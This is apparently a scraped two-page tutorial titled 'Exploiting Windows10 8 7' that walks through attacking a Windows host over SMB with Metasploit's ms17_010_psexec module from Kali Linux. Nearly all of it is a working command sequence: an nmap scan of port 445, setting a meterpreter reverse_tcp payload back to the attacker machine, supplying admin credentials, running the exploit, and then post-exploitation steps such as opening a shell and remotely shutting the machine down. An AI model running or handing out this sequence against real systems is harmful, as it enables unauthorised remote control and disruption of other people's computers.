Exploiting Windows10 8 7

You might also like

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 2

How to explot windows 10 / 8 / 7 :-

1. Exploiting windows 10 using ms17_010_psexec kali linux 2018 :-

i. Victim machine windows 10 ip address = 192.168.100.81


ii. Attacker machine kali linux ip address =
From kali linux machine:-
i. nmap –sV –p 445 <windows 10 victim machine ip address>
ii. 445 tcp port is open in windows machine
iii. Kali linux machine console :-
root@kali~: msfconsole
msf> search ms17_010_psexec
msf> use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > info
msf exploit(windows/smb/ms17_010_psexec) > options
msf exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_psexec) > set LHOST <kali linux machine ip address>
msf exploit(windows/smb/ms17_0101_psexec)> set LPORT 4444
msf exploit(windows/smb/ms17_010_psexec)> set RHOST 192.168.100.81 (windows victim machine ip )
msf exploit(windows/smb/ms17_010_psexec)> set SMBUser pente
(so the above line SMBUser <pente> is nothing but the administorator
username of the windows target machine and you can find this user
name by just visiting the windows machine and finding out issuing the
command like c:\users\pente> net user) …..
Msf exploit(windows/smb/ms17_010_psexec)> set SMBPass p3intest
Msf exploit(windows/smb/ms17_010_psexec)> options
Msf exploit(windows/smb/ms17_010_psexec)> exploit
So if the exploit is successful you will be getting the meterpreter session
Meterpreter> sysinfo
Meterpreter> shell
So issuing the shell command will get you the shell
C:\windows\system32> ipconfig
C:\windows\system32> exit
meterpreter> ps
meterpreter> getuid
meterpreter>getpid
meterpreter> shell
C:\windows\system32> shutdown –s –t 10 -c

iii.

You might also like